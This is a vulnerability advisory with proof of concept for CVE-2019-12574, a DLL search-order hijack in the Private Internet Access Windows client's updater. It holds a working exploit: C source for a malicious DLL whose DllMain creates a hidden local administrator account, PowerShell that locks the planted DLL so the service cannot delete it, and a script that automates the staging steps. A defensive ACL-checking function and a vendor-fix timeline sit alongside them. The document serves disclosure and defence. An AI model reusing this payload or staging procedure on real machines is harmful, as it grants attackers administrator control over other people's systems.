Title: PIA Windows Privilege Escalation: DLL Injection
Author: Rich Mirch
CVE: CVE-2019-12574
Vendor Advisory: https://www.privateinternetaccess.com/pages/changelog
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client v1.0 for Windows could allow an authenticated, local attacker to run
arbitrary code with elevated privileges.
The PIA desktop client is vulnerable to DLL planting (search-order hijacking)
during the update process. The update installer is written to, and executed
from, a staging folder that authenticated users can write to, and it resolves
several system DLLs from that folder before it looks in the system directories.
A low-privileged user can leverage this to execute arbitrary code as an
administrator.
When an update is available, a low-privileged user is notified in the client and
is presented with the option to download it. When clicked, the PIA client sends a
command to the PIA service to download the update. The update is staged in
"C:\ProgramData\Private Internet Access\update\". The service removes this
directory and all files within it before storing the update file.
A low-privileged user can create a file in the update directory and hold an open
handle on it that does not share delete access, which prevents the PIA service
from deleting it during the download process. This can be leveraged to stage a
malicious DLL that the update installer will load.
The next time an administrator opens the PIA client, a new option to install the
latest version is available. When clicked, the installer runs as that
administrator, loads the planted DLL and silently executes the attacker's code.
This PoC demonstrates the effect by adding a new local administrator named "woot"
during the update process.
CVSS
Vector: CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H/E:F/RL:U/RC:R
Base: 6.7
Temporal: 6.3
The following DLLs are loaded by pia-windows-x64-1.0-02176.exe (the staged
installer) from the update directory, so any one of them can serve as the
planting target:
C:\ProgramData\Private Internet Access\update\spinf.dll
C:\ProgramData\Private Internet Access\update\USERENV.dll
C:\ProgramData\Private Internet Access\update\newdev.dll
C:\ProgramData\Private Internet Access\update\DEVRTL.dll
C:\ProgramData\Private Internet Access\update\DEVOBJ.dll
C:\ProgramData\Private Internet Access\update\drvstore.dll
C:\ProgramData\Private Internet Access\update\PROPSYS.dll
C:\ProgramData\Private Internet Access\update\LINKINFO.dll
C:\ProgramData\Private Internet Access\update\ntshrui.dll
C:\ProgramData\Private Internet Access\update\SspiCli.dll
C:\ProgramData\Private Internet Access\update\srvcli.dll
C:\ProgramData\Private Internet Access\update\cscapi.dll
C:\ProgramData\Private Internet Access\update\CLDAPI.dll
C:\ProgramData\Private Internet Access\update\FLTLIB.DLL
C:\ProgramData\Private Internet Access\update\apphelp.dll
C:\ProgramData\Private Internet Access\update\netutils.dll
Permissions of "c:\ProgramData\Private Internet Access" (cacls output) showing
that BUILTIN\Users can create files and subdirectories: the (CI) entry grants
FILE_WRITE_DATA (create files) and FILE_APPEND_DATA (create subdirectories) on
this directory and on every subdirectory. All entries are marked (ID), i.e. they
are inherited from the default ACL of C:\ProgramData; the installer did not
restrict them.
c:\ProgramData\Private Internet Access NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                                       BUILTIN\Administrators:(OI)(CI)(ID)F
                                       CREATOR OWNER:(OI)(CI)(IO)(ID)F
                                       BUILTIN\Users:(OI)(CI)(ID)R
                                       BUILTIN\Users:(CI)(ID)(special access:)
                                                                FILE_WRITE_DATA
                                                                FILE_APPEND_DATA
                                                                FILE_WRITE_EA
                                                                FILE_WRITE_ATTRIBUTES
Permissions of "c:\ProgramData\Private Internet Access\update" after the
low-privileged user test1 created it in step 2. test1 has full control because
the CREATOR OWNER (OI)(CI)(IO)F entry on the parent is applied to whoever creates
the subfolder.
c:\ProgramData\Private Internet Access\update NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                                              BUILTIN\Administrators:(OI)(CI)(ID)F
                                              CHAOS\test1:(ID)F
                                              CREATOR OWNER:(OI)(CI)(IO)(ID)F
                                              BUILTIN\Users:(OI)(CI)(ID)R
                                              BUILTIN\Users:(CI)(ID)(special access:)
                                                                       FILE_WRITE_DATA
                                                                       FILE_APPEND_DATA
                                                                       FILE_WRITE_EA
                                                                       FILE_WRITE_ATTRIBUTES
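Checking for this condition generically, as an added example that is not part of the advisory: the PowerShell function below walks a directory tree and reports every allow ACE that grants file-creation rights (FILE_WRITE_DATA / FILE_APPEND_DATA, or a generic write/all right) to a principal other than SYSTEM, Administrators, CREATOR OWNER or TrustedInstaller. Run against the PIA folder it reports the inherited BUILTIN\Users entry on the parent and, once step 2 has been performed, the test1 full-control entry on the update subfolder. The function name, the trusted-principal list and the output shape are my own choices.

```powershell
# Added example, not part of the advisory: find directories under $Root where
# a non-privileged principal may create or overwrite files (DLL planting).
function Find-PlantableDirectory {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Root,
        # Principals that are allowed to write here; everyone else is reported.
        [string[]]$Trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                               'CREATOR OWNER', 'NT SERVICE\TrustedInstaller')
    )
    # On a directory FILE_WRITE_DATA (2) means "create files" and
    # FILE_APPEND_DATA (4) means "create subdirectories"; either lets an
    # attacker plant a DLL or a whole staging folder.
    $plantMask = [int]([System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
                       [System.Security.AccessControl.FileSystemRights]::CreateDirectories)
    # Generic rights are not decoded by FileSystemRights; treat GENERIC_WRITE
    # and GENERIC_ALL as plantable as well.
    $genericMask = 0x40000000 -bor 0x10000000

    $dirs = @(Get-Item -LiteralPath $Root) +
            @(Get-ChildItem -LiteralPath $Root -Directory -Recurse -ErrorAction SilentlyContinue)
    foreach ($dir in $dirs) {
        $acl = Get-Acl -LiteralPath $dir.FullName
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
            if ($Trusted -contains $ace.IdentityReference.Value) { continue }
            $rights = [int]$ace.FileSystemRights
            if ((($rights -band $plantMask) -ne 0) -or (($rights -band $genericMask) -ne 0)) {
                [pscustomobject]@{
                    Path      = $dir.FullName
                    Identity  = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                    Inherited = $ace.IsInherited
                    # ContainerInherit-only entries apply to subfolders (the
                    # (CI) entry above); ObjectInherit ones also apply to files.
                    AppliesTo = $ace.InheritanceFlags
                }
            }
        }
    }
}

# Usage (the folder named in the advisory):
Find-PlantableDirectory -Root 'C:\ProgramData\Private Internet Access' | Format-Table -AutoSize
```

Get-Acl only needs READ_CONTROL on the directory, which the R entry grants to Users, so the check runs without elevation. It looks at allow entries only: a deny entry earlier in the ACL, or a later ACL change by the installer, can revoke what it reports, so treat a hit as a lead to confirm by actually creating a file, not as proof on its own.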
Test Environment
OS: Microsoft Windows 10 Pro 10.0.17763 (Build 17763)
PIA Version: v0.9.9 beta
PIA Upgrade Version: v1.0
Steps to reproduce
All steps are executed as a low privileged user unless otherwise noted.
1) Open a cmd shell and change to the "C:\ProgramData\Private Internet Access" folder.
cd "c:\ProgramData\Private Internet Access"
2) Create the update folder and change to it.
mkdir update
cd update
3) Create a malicious library that creates an administrator account named woot when loaded.
/* Cross compile with
   x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared
   The installer is 64-bit (pia-windows-x64-*), so the planted DLL must be too.
*/
#include <windows.h>
#include <stdlib.h>   /* system() */

/* The payload runs from DllMain the moment the installer, running as the
   administrator who clicked "Install", loads this library, so the net
   commands run with that user's privileges. Spawning processes from DllMain
   is normally discouraged because the loader lock is held, but it is
   sufficient for a PoC. */
BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved )
{
    switch( fdwReason )
    {
    case DLL_PROCESS_ATTACH:
        /* Create a local user and add it to the Administrators group. */
        system("cmd /c net user woot insertpasswordhere /add");
        system("cmd /c net localgroup administrators woot /add");
        break;
    case DLL_THREAD_ATTACH:
        // Do thread-specific initialization.
        break;
    case DLL_THREAD_DETACH:
        // Do thread-specific cleanup.
        break;
    case DLL_PROCESS_DETACH:
        // Perform any necessary cleanup.
        break;
    }
    return TRUE; // Successful DLL_PROCESS_ATTACH.
}
4) Copy the malicious DLL into the update folder. For this PoC we will use spinf.dll
as the target.
copy woot.dll spinf.dll
5) Execute powershell and open spinf.dll with a handle that does not share delete
access, which prevents the library from being deleted. I appreciate @poshkatz for
teaching me how to easily lock files with PowerShell.
$f = [System.IO.File]::Open("spinf.dll", [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read)
Note that .NET resolves the relative path against the process working directory,
which is the update folder only because powershell was started from the cmd shell
in step 2; a cd inside PowerShell does not change it. Use the full path if in doubt.
6) Verify the lock by typing $f. The output should look like this.
CanRead : True
CanWrite : False
CanSeek : True
IsAsync : False
Length : 287283
Name : c:\ProgramData\Private Internet Access\update\spinf.dll
Position : 0
Handle : 880
SafeFileHandle : Microsoft.Win32.SafeHandles.SafeFileHandle
CanTimeout : False
ReadTimeout :
WriteTimeout :
7) Open the PIA client. An update will be available. Click Download v1.0.0.
8) Now that the update is staged, exit all windows and logout.
9) Login as an Administrator.
10) Open the PIA client and click the update icon in the upper right and then
click the "Install v1.0.0" option. The update will install normally.
11) At this point the "woot" administrator account will exist. Open a cmd shell
and verify.
net user woot
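The staging side of the procedure (steps 2 through 7), as an added PowerShell example that is not the advisory's own code. It assumes woot.dll was built as in step 3 and sits in the current directory. What it adds over the steps above is an explicit test that the FileShare.Read handle really refuses deletion before the download is triggered, and a listing afterwards to confirm the installer landed next to the surviving spinf.dll.

```powershell
# Added example, not part of the advisory: steps 2 to 7 as one script, plus a
# check that the lock really blocks deletion. Run as the low-privileged user
# from the directory that holds woot.dll (built as in step 3).
$staging = 'C:\ProgramData\Private Internet Access\update'
$target  = Join-Path $staging 'spinf.dll'

# Step 2: the parent ACL lets Users create subfolders, and CREATOR OWNER
# inheritance gives the creator full control of the new folder.
New-Item -ItemType Directory -Path $staging -Force | Out-Null

# Step 4: plant the payload under the name of a DLL the installer resolves
# from its own directory.
Copy-Item -LiteralPath '.\woot.dll' -Destination $target -Force

# Step 5: open the file with FileShare.Read. Other handles may still read and
# map the file (the installer must be able to load it), but nobody can open
# it with DELETE access, so the service's cleanup of the folder fails for
# this one file. The lock lives as long as $lock (or this process) does.
$lock = [System.IO.File]::Open($target,
    [System.IO.FileMode]::Open,
    [System.IO.FileAccess]::Read,
    [System.IO.FileShare]::Read)

# Step 6, done the hard way: prove the lock holds by trying to delete the
# file through a second handle. A sharing violation is the expected outcome;
# sharing modes are enforced per handle, so the same process is not exempt.
try {
    Remove-Item -LiteralPath $target -Force -ErrorAction Stop
    Write-Warning "Lock did NOT hold: $target was deleted; do not continue."
} catch {
    Write-Host "Lock holds: $($_.Exception.Message)"
}

# Step 7 is performed in the PIA client while this session stays open.
Read-Host 'Click Download in the PIA client, wait for it to finish, then press Enter' | Out-Null

# The staged installer should now sit next to the surviving DLL.
Get-ChildItem -LiteralPath $staging | Select-Object Name, Length, LastWriteTime

# Release the handle (logging out in step 8 would close it as well).
$lock.Dispose()
```

Keep the session open until the download has finished: once the service has cleared the folder and written the installer, the handle is no longer needed, which is why logging out in step 8 does not undo the staging.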
Timeline:
2019-01-13: Reported to vendor
2019-01-13: Vendor acknowledged receipt of report
2019-01-22: Vendor released fix in v1.0.1
2019-06-10: Public disclosure